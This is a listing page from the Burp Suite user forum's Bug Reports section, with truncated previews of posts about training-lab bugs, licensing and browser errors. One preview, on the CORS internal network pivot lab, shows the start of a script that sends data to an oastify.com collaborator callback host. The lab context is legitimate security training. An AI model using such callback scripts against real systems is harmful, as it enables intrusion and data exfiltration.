Burp Suite User Forum

Create new post

Burp Collaborator Default Servers Showing SSL Issue

Hi folks, When I (and other colleagues) run "Health Check" for Burp Collaborator on v2023.4.3 we are getting a significant amount of errors rendering Default Collaborator not functional. Is this a known issue affecting...

Last updated: May 22, 2023 08:32AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

No category "Gifts" on website

The lab revolves around a SQL injection on the category "Gifts", but there is none. https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data

Last updated: May 22, 2023 08:03AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Лабораторная работа: контрабанда HTTP-запросов, базовая TE.CL уязвимость

I tried to solve it myself several times, then your decision, and then as in the video. Nothing helps

Last updated: May 22, 2023 07:59AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

No more activations allowed

Hi Team, I am trying to reactivate my Burp Pro license several times on my different machines due to environmental issues. I unable to reactivate as I am getting "No more activations allowed for this license" message....

Last updated: May 22, 2023 07:36AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab Bug

I am facing trouble with 'Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft' lab. Firstly, somehow lab asks me to 'Make the database retrieve the string: '8.0.32-0ubuntu0.20.04.2'' when...

Last updated: May 21, 2023 07:58AM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Workaround for Java errors opening Burp on a secondary display on Linux

I encountered this and worked through it before I could blame Burp, so I want to post about it here for search-engine happiness. Using openjdk-17 on Linux with multiple monitors, Burp will start just fine on the first...

Last updated: May 19, 2023 09:04AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

TE.CL smuggling labs - official solutions do not work

The following labs don't seem to work / work stably. https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header To reproduce...

Last updated: May 19, 2023 07:30AM UTC | 1 Agent replies | 3 Community replies | Bug Reports

Getting the below error message only when I connect through Burp proxy, happens for all sites

I HAVE generated the Burp certificate and loaded it in to the browser (Firefox, Burp and Chrome) - problem persists. Yelp! The 'peer' in this case would be the Burp Proxy listener. Thanks. Secure Connection...

Last updated: May 19, 2023 07:00AM UTC | 2 Agent replies | 1 Community replies | Bug Reports

Built in Chromium browser crashes after computer goes into sleep

On Windows 11 every time the computer goes into sleep mode the built in Chromium browser crashes. When opened again it shows a message that the browser was not closed properly and if I want to restore the session.

Last updated: May 18, 2023 09:11PM UTC | 2 Agent replies | 3 Community replies | Bug Reports

Has anyone else noticed the bundled Chrome browser hangs on recent releases ?

Running v2023.3.4 at the moment but noticed it started around v2023.x. This is on latest patched Windows 10 release. Seems to occur almost randomly however running DOM invader with prototype pollution with Scan for...

Last updated: May 17, 2023 07:55AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

SSL Errors

Hi, it's me again. I've tried your solution to connect to the same website (the one of yves) but i still encounter SSL problems. I've installed also the certificate on my phone and it doesn't help. I've wrote also to your...

Last updated: May 17, 2023 07:27AM UTC | 5 Agent replies | 6 Community replies | Bug Reports

Lab: CORS vulnerability with internal network pivot attack

The LAB doesn't work, so I tried it myself, because we overestimate it, it doesn't work !! <script> bu_url = 'https://' + 'pf8ramweqox3mawt6h1l1w6v3m9ex3.oastify.com'; url = `http://192.168.0.135:8080/login`; ...

Last updated: May 16, 2023 09:21PM UTC | 1 Agent replies | 1 Community replies | Bug Reports

False Positives For Dependency confusion because of extra character...

To Whom it may concern, When opening a package-lock.json file in the browser with burp running, BurpSuite falsly identifies a HIGH Vulnerabilty know as Dependency Confusion every time... This is occuring because the "{"...

Last updated: May 15, 2023 04:19PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Everytime crashes the lab "Reflected XSS with some SVG markup allowed" when payloading it

Hello, I have an issue when I'm trying to do payloading to find XSS valid tags into "<>" tags. Everytime when I try to use Intruder to act the "Sniper" type of attack the server of this lab...

Last updated: May 15, 2023 01:14PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

In app browser fails to launch (Burp 2023.3.5/Java 17/Kali Linux)

Clicking the open browser buttons in the proxy tab or target tab has no impact, nothing shows up in diagnostics. When using health check for burps browser, the Checking headless browser gives this error: Aborting checks...

Last updated: May 15, 2023 07:08AM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Collaborator makes GET request to collaborator payload in User-Agent string

While testing a CRLF based header injection on an application I noticed that collaborator will make GET requests to any *.oastify.com hostname specified in the User-Agent header. For example, given the following...

Last updated: May 11, 2023 01:35PM UTC | 2 Agent replies | 0 Community replies | Bug Reports

Cache Poisoning Labs

I have been experiencing issues with the web cache poisoning labs the last couple days where the labs are not caching the HTTP responses at all. No matter how many times I resend the same basic requests (e.g. GET /), I...

Last updated: May 11, 2023 08:34AM UTC | 2 Agent replies | 3 Community replies | Bug Reports

Expert XXE challenge solvable in incorrect manner

Hello, While messing about with the "Expert" XXE Academy challenge ("Exploiting XXE to retrieve data by repurposing a local DTD"), I found that executing the same payload as the prior "Practitioner" challenge ("Exploiting...

Last updated: May 10, 2023 04:00PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab not working properly

I am doing the following lab https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-unkeyed-query But the response is not being cached, I have tried by sending a...

Last updated: May 10, 2023 01:21PM UTC | 2 Agent replies | 1 Community replies | Bug Reports

Burp suite is showing protocol error

when i tried using the lab for sqli the burp suite keep throwing me protocol error, i tried that by using firefox and the lab is working and didn't gave me an error. please resolve this issue.

Last updated: May 09, 2023 04:16PM UTC | 2 Agent replies | 2 Community replies | Bug Reports

Page 35 of 152

Burp Suite Support Center

Your source for help and advice on all things Burp-related.

Burp Suite Support Center image